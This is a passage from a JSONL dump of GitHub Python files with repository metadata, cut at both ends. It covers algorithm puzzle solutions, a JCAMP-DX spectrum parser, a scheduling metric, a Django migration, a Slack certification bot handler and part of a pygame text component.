in range(0, E*2-1, 2):\n p, c = edge[i], edge[i+1]\n if not left[p]:\n left[p] = c\n else:\n right[p] = c\n parent[c] = p\n c1_parent = []\n c2_parent = []\n find_parent(c1, c1_parent)\n find_parent(c2, c2_parent)\n cp = find_cp(c1_parent, c2_parent)\n sub_cnt = 0\n subtree(cp)\n print('#{} {} {}'.format(tc, cp, sub_cnt+1))","repo_name":"JIH319/cereal","sub_path":"inha/week04/1248_공통조상.py","file_name":"1248_공통조상.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"3447918541","text":"class Solution:\n def minOperations(self, nums: List[int], queries: List[int]) -> List[int]:\n nums.sort()\n n=len(nums)\n prefix=[0]*(n+1)\n ans=[]\n for i in range(n):\n prefix[i+1]=prefix[i]+nums[i]\n for q in queries:\n ind=bisect_left(nums,q)\n add=q*ind-(n-ind)*q\n to=prefix[-1]-2*prefix[ind]\n ans.append(add+to)\n\n return ans\n ","repo_name":"kibrnew/computative-kb","sub_path":"2602-minimum-operations-to-make-all-array-elements-equal/2602-minimum-operations-to-make-all-array-elements-equal.py","file_name":"2602-minimum-operations-to-make-all-array-elements-equal.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21394616860","text":"num = int(input())\r\nnumbers = map(int, input().split())\r\ncount = 0\r\n\r\nfor n in numbers:\r\n error = 0\r\n if n > 1:\r\n for i in range(2, n):\r\n if n % i == 0:\r\n error += 1\r\n if error == 0:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"hyeonjin6530/Baekjoon","sub_path":"백준/Silver/1978. 소수 찾기/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72316495404","text":"\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time.\nEach transformed word must exist in the word list.\nNote:\n\nReturn 0 if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\nYou may assume no duplicates in the word list.\nYou may assume beginWord and endWord are non-empty and are not the same.\n\"\"\"\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue = collections.deque([beginWord])\n wordList = set(wordList)\n distance = 1\n while queue:\n size = len(queue)\n for i in range(size):\n cur = queue.popleft()\n if cur == endWord:\n return distance\n for j in range(len(cur)):\n for c in 'abcdefghijklmnopqrstuvwxyz':\n nextWord = cur[:j] + c + cur[j+1:]\n if nextWord in wordList:\n wordList.remove(nextWord)\n queue.append(nextWord)\n distance += 1\n return 0\n \n # store distance together with each word in the queue\n # this way, we do not need to visit nodes level by level in bfs\n def ladderLength(self, beginWord, endWord, wordList):\n wordList = set(wordList)\n queue = collections.deque([[beginWord, 1]])\n while queue:\n word, length = queue.popleft()\n if word == endWord:\n return length\n for i in range(len(word)):\n for c in 'abcdefghijklmnopqrstuvwxyz':\n next_word = word[:i] + c + word[i+1:]\n if next_word in wordList:\n wordList.remove(next_word)\n queue.append([next_word, length + 1])\n return 0\n \n # my solution 4 years ago. 
almost the same as solution 1 above but better readability\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: Set[str]\n :rtype: int\n \"\"\"\n toVisit = collections.deque([beginWord])\n \n distance = 1\n \n def addNextWords(curWord):\n for i in range(len(curWord)):\n for k in range(26):\n k = chr(ord('a')+k)\n nextWord = curWord[:i] + k + curWord[i+1:]\n if nextWord in wordList or nextWord == endWord:\n toVisit.appendleft(nextWord)\n wordList.discard(nextWord)\n \n \n while toVisit:\n curLevelSize = len(toVisit)\n \n for i in range(curLevelSize):\n word = toVisit.pop()\n if word == endWord:\n return distance\n \n addNextWords(word)\n \n distance += 1\n return 0\n","repo_name":"xiangcao/Leetcode","sub_path":"python_leetcode_2020/Python_Leetcode_2020/127_word_ladder.py","file_name":"127_word_ladder.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22310486373","text":"# -*- coding: UTF-8 -*-\n# See the LICENSE.rst file for licensing information.\n\nimport datetime\nfrom numpy import array, append, arange, logical_not, log10, nan\nimport re\nimport pdb\n\n'''\njcamp.py contains functions useful for parsing JCAMP-DX formatted files containing spectral data. The main\nfunction `jcamp_readfile()` formats the input file into a Python dictionary, while `jcamp_calc_xsec()`\nconverts a given JCAMP-style data dictionary from absorption units to cross-section (m^2).\n\nThe bottom of the file contains an example script, so that if the module is run by itself, it will show several\nspectra plotted from data in repository folders.\n'''\n\n__authors__ = 'Nathan Hagen'\n__license__ = 'MIT/X11 License'\n__contact__ = 'Nathan Hagen '\n__all__ = ['jcamp_readfile', '_parse_longdate', 'jcamp_read', 'jcamp_calc_xsec', 'is_float', 'get_value', 'jcamp_parse']\n__version__ = '1.2.2'\n\n## In SQZ_digits, '+' or '-' is for PAC, ',' for CSV.\nSQZ_digits = {'@':'+0', 'A':'+1', 'B':'+2', 'C':'+3', 'D':'+4', 'E':'+5', 'F':'+6', 'G':'+7', 'H':'+8', 'I':'+9',\n 'a':'-1', 'b':'-2', 'c':'-3', 'd':'-4', 'e':'-5', 'f':'-6', 'g':'-7', 'h':'-8', 'i':'-9',\n '+':'+', '-':'-', ',':' '}\nDIF_digits = {'%': 0, 'J':1, 'K':2, 'L':3, 'M':4, 'N':5, 'O':6, 'P':7, 'Q':8, 'R':9,\n 'j':-1, 'k':-2, 'l':-3, 'm':-4, 'n':-5, 'o':-6, 'p':-7, 'q':-8, 'r':-9}\nDUP_digits = {'S':1, 'T':2, 'U':3, 'V':4, 'W':5, 'X':6, 'Y':7, 'Z':8, 's':9}\n\n# The specification allows multiple formats for representing LONGDATE.\n# See `FRACTIONAL_SECONDS_PATTERN` below for the optional token representing fractional seconds.\n# These fractional seconds are removed in advance. 
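Since the specification leaves the width of `.SSSS` open, the parser below guesses the unit from the digit count; a worked example of that convention, assuming the fraction has already been split off the date string:

    frac = "1234"                      # 4 digits
    if len(frac) in {7, 8, 9}:         # treat as nanoseconds
        microseconds = int(int(frac) / 1000)
    elif len(frac) in {4, 5, 6}:       # already microseconds
        microseconds = int(frac)
    else:                              # 1-3 digits: milliseconds
        microseconds = 1000 * int(frac)
    print(microseconds)                # 1234
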
Thus `%N` is not referenced in the formats below.\nDATE_FORMATS = [\"%Y/%m/%d %H:%M:%S %z\", \"%Y/%m/%d %H:%M:%S\", \"%Y/%m/%d\"]\n\n# The optional token describing the fractional seconds is referenced in the specification as `.SSSS`.\n# This number of digits (four) is rather unclear, since the usual presentation of a fraction of\n# seconds would contain either 3, 6 or 9 digits.\nFRACTIONAL_SECONDS_PATTERN = re.compile(\n r\"^\\d{4}/\\d{2}/\\d{2} +\\d{2}:\\d{2}\\d{2}(?P\\d{1,9})\"\n)\n\n##=====================================================================================================\ndef jcamp_readfile(filename):\n with open(filename, 'rb') as filehandle:\n data = jcamp_read(filehandle)\n data['filename'] = filename\n return(data)\n\n##=====================================================================================================\ndef _parse_longdate(date_string: str) -> datetime.datetime:\n \"\"\"parse the \"LONGDATE\" field according to the JCAMP-DX specification\n\n raises ValueError in case of problems\n \"\"\"\n fractional_seconds_match = FRACTIONAL_SECONDS_PATTERN.search(date_string)\n if fractional_seconds_match:\n # Remove the fractional seconds string - it would complicate `strptime`.\n date_string = FRACTIONAL_SECONDS_PATTERN.sub(\"\", date_string)\n\n # Try to interprete the fractional seconds. The JCAMP specification (v6.00) does not\n # explain, how a string of arbitrary length is supposed to be interpreted.\n # Thus we are just guessing based on the number of digits.\n fraction_seconds_string = fractional_seconds_match.group(\"fractional_seconds\")\n if len(fraction_seconds_string) in {7, 8, 9}:\n # this is probably nanoseconds\n microseconds = int(int(fraction_seconds_string) / 1000)\n elif len(fraction_seconds_string) in {4, 5, 6}:\n microseconds = int(fraction_seconds_string)\n elif len(fraction_seconds_string) in {1, 2, 3}:\n microseconds = 1000 * int(fraction_seconds_string)\n else:\n # We should never end up here.\n raise ValueError(\"Fractional seconds string could not be parsed: {}\".format(fraction_seconds_string))\n else:\n microseconds = 0\n\n # Parse the date and time.\n for fmt in DATE_FORMATS:\n try:\n parsed = datetime.datetime.strptime(date_string, fmt)\n except ValueError:\n pass\n else:\n # Inject the previously parsed microseconds\n return parsed.replace(microsecond=microseconds)\n else:\n raise ValueError(\"Failed to parse the date string: {}\".format(date_string))\n\n##=====================================================================================================\ndef jcamp_read(filehandle):\n '''\n Read a JDX-format file, and return a dictionary containing the header info, a 1D numpy vectors `x` for the\n abscissa information (e.g. wavelength or wavenumber) and `y` for the ordinate information (e.g. 
transmission).\n\n Parameters\n ----------\n filehandle : str\n The object representing the JCAMP-DX filename to read.\n\n Returns\n -------\n jcamp_dict : dict\n The dictionary containing the header and data vectors.\n '''\n\n jcamp_dict = {}\n xstart = []\n xnum = []\n y = []\n x = []\n datastart = False\n is_compound = False\n in_compound_block = False\n compound_block_contents = []\n re_num = re.compile(r'\\d+')\n lhs = None\n for line in filehandle:\n ## When parsing compound files, the input is an array of strings, so no need to decode it twice.\n if hasattr(line, 'decode'):\n line = line.decode('utf-8','ignore')\n\n if not line.strip():\n continue\n if line.startswith('$$'):\n continue\n\n ## Detect the start of a compound block\n if is_compound and line.upper().startswith('##TITLE'):\n in_compound_block = True\n compound_block_contents = [line]\n continue\n\n ## If we are reading a compound block, collect lines into an array to be processed by a\n ## recursive call this this function.\n if in_compound_block:\n ## Store this line.\n compound_block_contents.append(line)\n\n ## Detect the end of the compound block.\n if line.upper().startswith('##END'):\n ## Process the entire block and put it into the children array.\n jcamp_dict['children'].append(jcamp_read(compound_block_contents))\n in_compound_block = False\n compound_block_contents = []\n continue\n\n ## Lines beginning with '##' are header lines.\n if line.startswith('##'):\n line = line.strip('##')\n (lhs,rhs) = line.split('=', 1)\n lhs = lhs.strip().lower()\n rhs = rhs.strip()\n #continuation = rhs.endswith('=')\n\n if rhs.isdigit():\n jcamp_dict[lhs] = int(rhs)\n elif is_float(rhs):\n jcamp_dict[lhs] = float(rhs)\n else:\n jcamp_dict[lhs] = rhs\n\n ## Detect compound files.\n ## See table XI in http://www.jcamp-dx.org/protocols/dxir01.pdf\n if (lhs in {'data type', 'datatype'}) and (rhs.lower() == 'link'):\n is_compound = True\n jcamp_dict['children'] = []\n\n if (lhs in ('xydata', 'xypoints', 'peak table')):\n ## This is a new data entry, reset x and y.\n x = []\n y = []\n datastart = True\n datatype = rhs\n continue ## data starts on next line\n elif (lhs == 'end'):\n bounds = [int(i) for i in re_num.findall(rhs)]\n datastart = True\n datatype = bounds\n datalist = []\n continue\n elif lhs == 'longdate':\n try:\n parsed = _parse_longdate(jcamp_dict[lhs])\n except ValueError:\n # Keep the original date string.\n pass\n else:\n # Replace the string with the datetime object.\n jcamp_dict[lhs] = parsed\n elif datastart:\n datastart = False\n elif lhs is not None and not datastart: # multiline entry\n jcamp_dict[lhs] += '\\n{}'.format(line.strip())\n\n if datastart and (datatype == '(X++(Y..Y))'):\n ## If the line does not start with '##' or '$$' then it should be a data line.\n ## The pair of lines below involve regex splitting on floating point numbers and integers. 
We can't just\n ## split on spaces because JCAMP allows minus signs to replace spaces in the case of negative numbers.\n datavals = jcamp_parse(line)\n xstart.append(float(datavals[0]))\n xnum.append(len(datavals) - 1)\n for dataval in datavals[1:]:\n y.append(float(dataval))\n elif datastart and (('xypoints' in jcamp_dict) or ('xydata' in jcamp_dict)) and (datatype == '(XY..XY)'):\n datavals = [v.strip() for v in re.split(r\"[,;\\s]\", line) if v] ## be careful not to allow empty strings\n if not all(is_float(datavals)): continue\n datavals = array(datavals)\n x.extend(datavals[0::2]) ## every other data point starting at the zeroth\n y.extend(datavals[1::2]) ## every other data point starting at the first\n elif datastart and ('peak table' in jcamp_dict) and (datatype == '(XY..XY)'):\n datavals = [v.strip() for v in re.split(r\"[,;\\s]\", line) if v] ## be careful not to allow empty strings\n if not all(is_float(datavals)): continue\n datavals = array(datavals)\n x.extend(datavals[0::2]) ## every other data point starting at the zeroth\n y.extend(datavals[1::2]) ## every other data point starting at the first\n elif datastart and isinstance(datatype,list):\n ## If the line does not start with '##' or '$$' then it should be a data line.\n ## The pair of lines below involve regex splitting on floating point numbers and integers. We can't just\n ## split on spaces because JCAMP allows minus signs to replace spaces in the case of negative numbers.\n datavals = jcamp_parse(line)\n datalist += datavals\n\n if ('xydata' in jcamp_dict) and (jcamp_dict['xydata'] == '(X++(Y..Y))'):\n ## You got all of the Y-values. Next you need to figure out how to generate the missing X's...\n ## First look for the \"lastx\" dictionary entry. You will need that one to finish the set.\n xstart.append(jcamp_dict['lastx'])\n x = array([])\n for n in range(len(xnum)-1):\n dx = (xstart[n+1] - xstart[n]) / xnum[n]\n x = append(x, xstart[n]+(dx*arange(xnum[n])))\n #print(n, xstart[n], xstart[n+1], xnum[n], xstart[n]+(dx*arange(xnum[n])))\n\n ## The last line must be treated separately.\n if (xnum[len(xnum)-1] > 1):\n dx = (jcamp_dict['lastx'] - xstart[len(xnum)-1]) / (xnum[len(xnum)-1] - 1.0)\n x = append(x, xstart[len(xnum)-1]+(dx*arange(xnum[len(xnum)-1])))\n #print(n, xstart[len(xnum)-1]+(dx*arange(xnum[len(xnum)-1])))\n else:\n x = append(x, jcamp_dict['lastx'])\n\n y = array([float(yval) for yval in y])\n else:\n x = array([float(xval) for xval in x])\n y = array([float(yval) for yval in y])\n\n ## The \"xfactor\" and \"yfactor\" variables contain any scaling information that may need to be applied\n ## to the data. Go ahead and apply them.\n if ('xfactor' in jcamp_dict):\n x = x * jcamp_dict['xfactor']\n if ('yfactor' in jcamp_dict):\n y = y * jcamp_dict['yfactor']\n jcamp_dict['x'] = x\n jcamp_dict['y'] = y\n\n return(jcamp_dict)\n\n##=====================================================================================================\ndef jcamp_calc_xsec(jcamp_dict, wavemin=None, wavemax=None, skip_nonquant=True, debug=False):\n '''\n Taking as input a JDX file, extract the spectrum information and transform the absorption spectrum from existing\n units to absorption cross-section.\n\n This function also corrects for unphysical data (such as negative transmittance values, or transmission above\n 1.0), and calculates absorbance if transmittance given. 
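A worked sketch of that transmittance-to-absorbance step (clip unphysical values, then A = log10(1/T) wherever T > 0, NaN elsewhere):

    import numpy as np

    T = np.array([-0.05, 0.10, 0.50, 1.20])
    T[T < 0.0] = 0.0                  # negative transmittance is unphysical
    T[T > 1.0] = 1.0                  # as is transmission above 1.0
    ok = T > 0.0
    A = np.full_like(T, np.nan)
    A[ok] = np.log10(1.0 / T[ok])
    print(A)                          # [nan, 1.0, 0.301..., 0.0]
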
Instead of a return value, the function inserts the\n information into the input dictionary.\n\n Note that the conversion assumes that the measurements were collected for gas at a temperature of 296K (23 degC).\n\n Parameters\n ----------\n jcamp_dict : dict\n A JCAMP spectrum dictionary.\n wavemin : float, optional\n The shortest wavelength in the spectrum to limit the calculation to.\n wavemax : float, optional\n The longest wavelength in the spectrum to limit the calculation to.\n skip_nonquant: bool\n If True then return \"None\" if the spectrum is missing quantitative data. If False, then try to fill in \\\n missing quantitative values with defaults.\n '''\n\n x = array(jcamp_dict['x']) ## use 'array' to force a copy so that we cannot change the original data\n y = array(jcamp_dict['y']) ## use 'array' to force a copy so that we cannot change the original data\n\n T = 296.0 ## the temperature (23 degC) used by NIST when collecting spectra\n R = 1.0355E-25 ## the constant for converting data (includes the gas constant)\n\n ## Note: normally when we convert from wavenumber to wavelength units, the ordinate must be nonuniformly\n ## rescaled in order to compensate. But this is only true if we resample the abscissa to a uniform sampling\n ## grid. In this case here, we keep the sampling grid nonuniform in wavelength space, such that each digital\n ## bin retains its proportionality to energy, which is what we want.\n if (jcamp_dict['xunits'].lower() in ('1/cm', 'cm-1', 'cm^-1')):\n jcamp_dict['wavenumbers'] = array(x) ## note that array() always performs a copy\n x = 10000.0 / x\n jcamp_dict['wavelengths'] = x\n elif (jcamp_dict['xunits'].lower() in ('micrometers', 'um', 'wavelength (um)')):\n jcamp_dict['wavelengths'] = x\n jcamp_dict['wavenumbers'] = 10000.0 / x\n elif (jcamp_dict['xunits'].lower() in ('nanometers', 'nm', 'wavelength (nm)')):\n x = x / 1000.0\n jcamp_dict['wavelengths'] = x\n jcamp_dict['wavenumbers'] = 10000.0 / x\n else:\n raise ValueError('Don\\'t know how to convert the spectrum\\'s x units (\"' + jcamp_dict['xunits'] + '\") to micrometers.')\n\n ## Correct for any unphysical negative values.\n y[y < 0.0] = 0.0\n\n ## Make sure \"y\" refers to absorbance.\n if (jcamp_dict['yunits'].lower() == 'transmittance'):\n ## If in transmittance, then any y > 1.0 are unphysical.\n y[y > 1.0] = 1.0\n\n ## Convert to absorbance.\n okay = (y > 0.0)\n y[okay] = log10(1.0 / y[okay])\n y[logical_not(okay)] = nan\n\n jcamp_dict['absorbance'] = y\n elif (jcamp_dict['yunits'].lower() == 'absorbance'):\n pass\n elif (jcamp_dict['yunits'].lower() == '(micromol/mol)-1m-1 (base 10)'):\n jcamp_dict['yunits'] = 'xsec (m^2))'\n jcamp_dict['xsec'] = y / 2.687e19\n return\n else:\n raise ValueError('Don\\'t know how to convert the spectrum\\'s y units (\"' + jcamp_dict['yunits'] + '\") to absorbance.')\n\n ## Determine the effective path length \"ell\" of the measurement chamber, in meters.\n if ('path length' in jcamp_dict):\n (val,unit) = jcamp_dict['path length'].lower().split()[0:2]\n if (unit == 'cm'):\n ell = float(val) / 100.0\n elif (unit == 'm'):\n ell = float(val)\n elif (unit == 'mm'):\n ell = float(val) / 1000.0\n else:\n ell = 0.1\n else:\n if skip_nonquant: return({'info':None, 'x':None, 'xsec':None, 'y':None})\n ell = 0.1\n if debug: print('Path length variable not found. 
Using 0.1m as a default ...')\n\n assert(len(x) == len(y))\n\n if ('npoints' in jcamp_dict):\n if (len(x) != jcamp_dict['npoints']):\n npts_retrieved = str(len(x))\n msg = '\"' + jcamp_dict['title'] + '\": Number of data points retrieved (' + npts_retrieved + \\\n ') does not equal the expected length (npoints = ' + str(jcamp_dict['npoints']) + ')!'\n raise ValueError(msg)\n\n ## For each gas, manually define the pressure \"p\" at which the measurement was taken (in units of mmHg).\n ## These values are obtained from the NIST Infrared spectrum database, which for some reason did not\n ## put the partial pressure information into the header.\n if ('partial_pressure' in jcamp_dict):\n p = float(jcamp_dict['partial_pressure'].split()[0])\n p_units = jcamp_dict['partial_pressure'].split()[1]\n if (p_units.lower() == 'mmhg'):\n pass\n elif (p_units.lower() == 'ppm'):\n p = p * 759.8 * 1.0E-6 ## scale PPM units at atmospheric pressure to partial pressure in mmHg\n else:\n if debug: print('Partial pressure variable value for ' + jcamp_dict['title'] + ' is missing. Using the default p = 150.0 mmHg ...')\n if skip_nonquant: return({'info':None, 'x':None, 'xsec':None, 'y':None})\n p = 150.0\n\n ## Convert the absorbance units to cross-section in meters squared per molecule.\n xsec = y * T * R / (p * ell)\n\n ## Add the \"xsec\" values to the data dictionary.\n jcamp_dict['xsec'] = xsec\n\n return\n\n##=====================================================================================================\ndef is_float(s):\n '''\n Test if a string, or list of strings, contains a numeric value(s).\n\n Parameters\n ----------\n s : str, or list of str\n The string or list of strings to test.\n\n Returns\n -------\n is_float_bool : bool or list of bool\n A single boolean or list of boolean values indicating whether each input can be converted into a float.\n '''\n\n if isinstance(s,tuple) or isinstance(s,list):\n if not all(isinstance(i, str) for i in s):\n raise TypeError(\"Input {} is not a list of strings\".format(s))\n if (len(s) == 0):\n raise ValueError('Input {} is empty'.format(s))\n else:\n bool = list(True for i in range(0,len(s)))\n for i in range(0,len(s)):\n try:\n float(s[i])\n except ValueError:\n bool[i] = False\n return(bool)\n else:\n if not isinstance(s, str):\n raise TypeError(\"Input '%s' is not a string\" % (s))\n\n try:\n float(s)\n return(True)\n except ValueError:\n return(False)\n\n##=====================================================================================================\ndef get_value(num, is_dif, vals):\n n = float(num)\n if is_dif:\n lastval = vals[-1]\n val = n + lastval\n else:\n val = n\n\n return(val)\n\n##=====================================================================================================\ndef jcamp_parse(line):\n line = line.strip()\n\n datavals = []\n num = \"\"\n\n ## Convert whitespace into single space by splitting the string then re-assembling with single spaces.\n line = ' '.join(line.split())\n\n ## If there are any coded digits, then replace the codes with the appropriate numbers.\n ## 'DUP_digits' are characters that represent how many times the previous character should be replicated.\n ## 'DIF_digits' represent ...?\n ## 'SQZ_digits' represent ...?\n DUP_set = set(DUP_digits)\n\n if any(c in DUP_set for c in line):\n ## Split the line into individual characters so that you can check for coded characters one-by-one.\n newline = ''\n for (i,c) in enumerate(line):\n if (c in DUP_digits):\n prev_c = line[i-1]\n mul = DUP_digits[c]\n 
newline += prev_c * (mul-1)\n else:\n mul = ''\n newline += c\n line = \"\".join(newline)\n\n DIF = False\n for c in line:\n if c.isdigit() or (c == \".\"):\n num += c\n elif (c == ' '):\n DIF = False\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n num = ''\n elif (c in SQZ_digits):\n DIF = False\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n num = SQZ_digits[c]\n elif (c in DIF_digits):\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n DIF = True\n num = str(DIF_digits[c])\n else:\n raise Exception(\"Unknown character (%s) encountered while parsing data\" % c)\n\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n\n return(datavals)\n\n## =================================================================================================\n## =================================================================================================\n\nif (__name__ == '__main__'):\n import matplotlib.pyplot as plt\n filename = './data/infrared_spectra/ethylene.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.plot(jcamp_dict['x'], jcamp_dict['y'])\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n jcamp_calc_xsec(jcamp_dict, skip_nonquant=False, debug=False)\n plt.figure()\n plt.plot(jcamp_dict['wavelengths'], jcamp_dict['xsec'])\n plt.title(filename)\n plt.xlabel('wavelength (um)')\n plt.ylabel('absorption cross-section (m^2)')\n\n filename = './data/uvvis_spectra/toluene.jdx'\n plt.figure()\n jcamp_dict = jcamp_readfile(filename)\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'r-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/mass_spectra/ethanol_ms.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n for n in arange(len(jcamp_dict['x'])):\n plt.plot((jcamp_dict['x'][n],jcamp_dict['x'][n]), (0.0, jcamp_dict['y'][n]), 'm-', linewidth=2.0)\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/raman_spectra/tannic_acid.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'k-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/neutron_scattering_spectra/emodine.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'k-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/infrared_spectra/example_compound_file.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n for c in jcamp_dict['children']:\n plt.plot(c['x'], c['y'])\n plt.xlabel(jcamp_dict['children'][0]['xunits']) ## assume all blocks have the same units\n plt.ylabel(jcamp_dict['children'][0]['yunits'])\n plt.title(filename)\n\n filename = './data/infrared_spectra/example_multiline_datasets.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'])\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n print(jcamp_dict['comments'])\n\n plt.show()\n","repo_name":"nzhagen/jcamp","sub_path":"jcamp.py","file_name":"jcamp.py","file_ext":"py","file_size_in_byte":23513,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"19"} +{"seq_id":"21674045990","text":"\"\"\"\n @author: HimanshuMittal01\n @organization: ripiktech\n\"\"\"\n\nfrom 
typing import Dict, Any\n\nimport pandas as pd\n\nfrom optimus.metrics._core import Metric\nfrom optimus.utils.views import view_by_product\nfrom optimus.machines.machine import Machine\n\n\nclass TotalCompletionTime(Metric):\n def __init__(self):\n super().__init__(name=\"total_completion_time\", maximise=False)\n\n def __call__(\n self,\n machines: Dict[str, Machine] = None,\n product_view: pd.DataFrame = None,\n *args,\n **kwargs\n ):\n if product_view is None:\n product_view = view_by_product(machines=machines)\n\n total_value = product_view[\"rel_end_time\"].max()\n return total_value\n","repo_name":"Vishruth-N/Ripik_Test","sub_path":"optimus/metrics/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33043164121","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport uimg.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', models.ImageField(upload_to=uimg.models.get_user_image_path, verbose_name=b'\\xd0\\x98\\xd0\\xb7\\xd0\\xbe\\xd0\\xb1\\xd1\\x80\\xd0\\xb0\\xd0\\xb6\\xd0\\xb5\\xd0\\xbd\\xd0\\xb8\\xd0\\xb5')),\n ('date', models.DateTimeField(default=datetime.datetime(2015, 6, 11, 15, 25, 9, 540983), verbose_name=b'\\xd0\\x94\\xd0\\xb0\\xd1\\x82\\xd0\\xb0')),\n ('desc', models.TextField(default=b'', max_length=250, null=True, verbose_name=b'\\xd0\\x9e\\xd0\\xbf\\xd0\\xb8\\xd1\\x81\\xd0\\xb0\\xd0\\xbd\\xd0\\xb8\\xd0\\xb5', blank=True)),\n ],\n options={\n 'verbose_name': '\\u0418\\u0437\\u043e\\u0431\\u0440\\u0430\\u0436\\u0435\\u043d\\u0438\\u0435',\n 'verbose_name_plural': '\\u0418\\u0437\\u043e\\u0431\\u0440\\u0430\\u0436\\u0435\\u043d\\u0438\\u044f',\n },\n ),\n ]\n","repo_name":"loobinsk/newprj","sub_path":"uimg/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26079725207","text":"import json\nimport logging\nimport re\nimport requests\nimport urllib\nfrom certification_management.business import Level\nfrom certification_management.business import User\nfrom certification_management.business import UserCertification\nfrom certification_management.business import Voucher\nfrom utils.configuration import Configuration\n\n\nclass CertibotEvents:\n def __init__(self, environment):\n # Logging configuration\n logging.basicConfig()\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.INFO)\n\n self.environment = environment\n\n def launch(self, event):\n # Manage 'challenge' from Slack to validate the lambda.\n if \"challenge\" in event:\n return event[\"challenge\"]\n\n slack_event = event['event']\n\n # Ignore message from bot.\n if not \"bot_id\" in slack_event \\\n and slack_event['type'] == 'user_change' \\\n and 'XfELFP2WL9' in slack_event['user']['profile']['fields']:\n\n # Application configuration\n config = Configuration(self.logger, self.environment)\n\n # Check input token\n if not event['token'] in config.slack_event_token:\n return \"403 Forbidden\"\n\n self.logger.info(slack_event['user']['real_name'] + \" gets \" + 
slack_event['user']['profile']['fields']['XfELFP2WL9']['value'] + \" certification!\")\n\n user_udid = slack_event['user']['id']\n user_level_name = re.search(' \\((.+?) level\\)', slack_event['user']['profile']['fields']['XfELFP2WL9']['value'].lower()).group(1)\n\n user = User.get(user_udid)\n level = Level.getByName(user_level_name)\n\n if user and level:\n for user_certification in user.user_certifications:\n user_certification.passesCertification(level)\n\n return \"200 OK\"\n","repo_name":"axel-springer-kugawana/gtt_certibot","sub_path":"lambda/certification_management/certibot_events.py","file_name":"certibot_events.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33086187975","text":"\"\"\"\nClasses:\n - TextComponent\n\"\"\"\n\nfrom time import time\nfrom math import floor\nfrom pygame.font import Font\nfrom pygame import Surface, event\nfrom source.core.component import Component\nfrom source.core.tools import Position\n\n\nclass TextComponent(Component):\n \"\"\"\n A component used to display text.\n \"\"\"\n def __init__(self, font: str, size: int, color: tuple[int, int, int], render_position: Position, render_width: int, render_height: int, animated: bool = False, speed: float = 1.0) -> None:\n \"\"\"\n :param font: The path of the font used.\n :param size: The size of the font.\n :param color: The color of the text.\n :param render_position: The position of the text box.\n :param render_width: The width of the text box.\n :param render_height: The height of the text box.\n :param animated: True if the text needs to appear in an animated way.\n :param speed: If `animated=True`, sets the speed of apparition of the text.\n \"\"\"\n super().__init__(render_position, render_width, render_height)\n\n self.font = Font(font, size)\n self.color = color\n self.lines: list[str] = []\n self.rendered_lines: list[Surface] = []\n\n self.animated = animated\n self.current_lines: list[str] = []\n self.speed = speed\n self.apparition_time = -1\n\n def set_text(self, lines: list[str]) -> None:\n \"\"\" Change the text to display.\n\n :param lines: The lines of text which will be displayed.\n \"\"\"\n self.lines = lines\n\n if not self.animated:\n self.pre_render()\n else:\n self.current_lines = []\n self.apparition_time = -1\n\n def 